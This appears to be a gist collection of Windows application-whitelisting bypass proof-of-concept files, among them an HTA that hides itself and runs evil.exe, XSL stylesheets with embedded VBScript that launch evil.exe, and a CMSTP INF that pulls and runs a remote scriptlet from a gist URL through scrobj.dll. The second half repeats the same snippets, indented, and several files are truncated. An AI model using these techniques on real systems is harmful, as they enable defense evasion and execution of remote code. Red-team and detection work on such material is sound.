fareedfauzi

## evil.hta
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "evil.exe"
self.close
</script>

## evil.inf
; ----------------------------------------------------------------------
; Required Sections
; ----------------------------------------------------------------------
[Version]
Signature=$CHICAGO$
Provider=test
Class=Printer

[Manufacturer]
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64

## evil.url
[InternetShortcut]
URL=file:///c:\windows\system32\evil.exe

## argv1.xml
<a></a>

## jscript.xml
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">
<!--
	From:
		https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1#file-script-xsl
-->

## vbscript.xml
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="urn:my-scripts">

<msxsl:script language="VBScript" implements-prefix="user">
function myFunction()
set shell=createobject("wscript.shell")
shell.run "evil.exe",0
myFunction = 0

## poc.vbs
MsgBox "Bypassed!"

## cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/fareedfauzi/17705115ffad1d66af5fbbdb0afbca41/raw/e483189823cde37294fd212ce6b552f533158032/evil.sct

## open_with.bat
@echo off
echo ====================================================
echo  Example of usage... :)
echo  Enter executable path: C:\Program Files\HxD\HxD.exe
echo  Enter your program's name:  HxD
echo ====================================================
echo.
set /p exepath=Enter executable path:
set /p programName=Enter your program's name:


## HelloWorld.ps1
Write-Output "Hello World"
	<HTML>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<HEAD>
	<script language="VBScript">
	Window.ReSizeTo 0, 0
	Window.moveTo -2000,-2000
	Set objShell = CreateObject("Wscript.Shell")
	objShell.Run "evil.exe"
	self.close
	</script>
	; ----------------------------------------------------------------------
	; Required Sections
	; ----------------------------------------------------------------------
	[Version]
	Signature=$CHICAGO$
	Provider=test
	Class=Printer

	[Manufacturer]
	HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
	<?xml version='1.0'?>
	<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:user="http://mycompany.com/mynamespace">
	<!--
	From:
	https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1#file-script-xsl
	-->
	[version]
	Signature=$chicago$
	AdvancedINF=2.5

	[DefaultInstall_SingleUser]
	UnRegisterOCXs=UnRegisterOCXSection

	[UnRegisterOCXSection]
	%11%\scrobj.dll,NI,https://gist.githubusercontent.com/fareedfauzi/17705115ffad1d66af5fbbdb0afbca41/raw/e483189823cde37294fd212ce6b552f533158032/evil.sct
	@echo off
	echo ====================================================
	echo Example of usage... :)
	echo Enter executable path: C:\Program Files\HxD\HxD.exe
	echo Enter your program's name: HxD
	echo ====================================================
	echo.
	set /p exepath=Enter executable path:
	set /p programName=Enter your program's name: